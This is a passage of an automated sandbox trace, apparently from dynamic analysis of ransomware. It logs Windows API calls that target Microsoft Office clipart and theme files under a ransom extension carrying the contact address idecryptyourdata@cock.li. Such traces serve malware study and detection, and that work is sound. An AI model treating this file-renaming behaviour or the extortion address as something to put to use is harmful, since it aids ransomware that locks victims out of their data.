dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0174.572] CloseHandle (hObject=0x52c) returned 1 [0174.572] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0174.573] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0174.573] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\TN00011_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\tn00011_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0174.573] CloseHandle (hObject=0x52c) returned 1 [0174.574] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0174.574] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0174.574] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\TN00014_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\tn00014_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0174.574] CloseHandle (hObject=0x52c) returned 1 [0174.575] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0174.930] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0174.930] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\TN00018_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\tn00018_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0174.930] CloseHandle (hObject=0x52c) returned 1 [0174.932] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0174.932] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0174.932] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\WB01740_.GIF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\wb01740_.gif.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0174.932] CloseHandle (hObject=0x52c) returned 1 [0174.933] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0174.933] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0174.933] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\WB01742_.GIF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\wb01742_.gif.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0174.933] CloseHandle (hObject=0x52c) returned 1 [0174.934] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0174.934] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0174.934] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\WB01743_.GIF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\wb01743_.gif.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0174.934] CloseHandle (hObject=0x52c) returned 1 [0174.935] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0174.935] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0174.935] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\WB01744_.GIF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\wb01744_.gif.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0174.935] CloseHandle (hObject=0x52c) returned 1 [0174.936] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0174.936] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0174.936] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\WB01745_.GIF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\wb01745_.gif.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0174.937] CloseHandle (hObject=0x52c) returned 1 [0174.937] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0174.937] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0174.937] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\WB01746_.GIF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\wb01746_.gif.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0174.938] CloseHandle (hObject=0x52c) returned 1 [0174.939] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0174.939] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0174.939] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\WB01747_.GIF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\wb01747_.gif.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0174.939] CloseHandle (hObject=0x52c) returned 1 [0174.940] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0174.940] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0174.940] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\WB01748_.GIF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\wb01748_.gif.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0174.940] CloseHandle (hObject=0x52c) returned 1 [0174.941] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0174.941] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0174.941] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\WB01749_.GIF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\wb01749_.gif.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0174.941] CloseHandle (hObject=0x52c) returned 1 [0174.943] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0174.943] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0174.943] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\WB01750_.GIF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\wb01750_.gif.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0174.943] CloseHandle (hObject=0x52c) returned 1 [0174.944] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0174.944] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0174.944] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\WB01751_.GIF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\wb01751_.gif.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0174.945] CloseHandle (hObject=0x52c) returned 1 [0174.946] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0174.946] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0174.946] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\WB01770_.GIF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\wb01770_.gif.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0174.946] CloseHandle (hObject=0x52c) returned 1 [0174.947] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0174.947] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0174.947] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\WB01838_.GIF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\wb01838_.gif.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0174.948] CloseHandle (hObject=0x52c) returned 1 [0174.948] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0174.949] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0174.949] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\WB01839_.GIF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\wb01839_.gif.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0174.949] CloseHandle (hObject=0x52c) returned 1 [0174.950] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0174.950] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0174.950] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\WB01840_.GIF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\wb01840_.gif.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0174.951] CloseHandle (hObject=0x52c) returned 1 [0174.951] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0174.951] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0174.951] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\WB01842_.GIF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\wb01842_.gif.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0174.952] CloseHandle (hObject=0x52c) returned 1 [0174.952] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0174.952] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0174.952] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\WB01843_.GIF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\wb01843_.gif.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0174.952] CloseHandle (hObject=0x52c) returned 1 [0174.953] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0174.954] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0174.954] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\WB02229_.GIF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\wb02229_.gif.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0174.954] CloseHandle (hObject=0x52c) returned 1 [0174.956] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0174.956] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0174.956] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\WHIRL1.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\whirl1.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0174.956] CloseHandle (hObject=0x52c) returned 1 [0174.957] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0174.957] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0174.957] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\WHIRL2.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\whirl2.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0174.957] CloseHandle (hObject=0x52c) returned 1 [0174.958] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0174.958] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0174.958] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\WING1.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\wing1.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0174.959] CloseHandle (hObject=0x52c) returned 1 [0174.959] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0174.959] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0174.959] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\WING2.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\wing2.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0174.960] CloseHandle (hObject=0x52c) returned 1 [0174.962] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0174.962] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0174.962] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\Publisher\\Backgrounds\\J0143743.GIF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\publisher\\backgrounds\\j0143743.gif.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0174.962] CloseHandle (hObject=0x52c) returned 1 [0174.963] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0174.963] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0174.963] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\Publisher\\Backgrounds\\J0143744.GIF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\publisher\\backgrounds\\j0143744.gif.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0174.964] CloseHandle (hObject=0x52c) returned 1 [0174.964] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0174.965] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0174.965] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\Publisher\\Backgrounds\\J0143745.GIF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\publisher\\backgrounds\\j0143745.gif.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0175.358] CloseHandle (hObject=0x52c) returned 1 [0175.358] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0175.358] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0175.358] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Document Themes 16\\Theme Fonts\\Garamond-TrebuchetMs.xml.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\document themes 16\\theme fonts\\garamond-trebuchetms.xml.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0175.359] CloseHandle (hObject=0x52c) returned 1 [0175.359] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0175.359] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0175.359] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Document Themes 16\\Theme Fonts\\Garamond.xml.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\document themes 16\\theme fonts\\garamond.xml.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0175.360] CloseHandle (hObject=0x52c) returned 1 [0175.361] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0175.361] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0175.361] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Document Themes 16\\Theme Fonts\\Georgia.xml.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\document themes 16\\theme fonts\\georgia.xml.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0175.361] CloseHandle (hObject=0x52c) returned 1 [0175.361] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0175.362] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0175.362] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Document Themes 16\\Theme Fonts\\Gill Sans MT.xml.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\document themes 16\\theme fonts\\gill sans 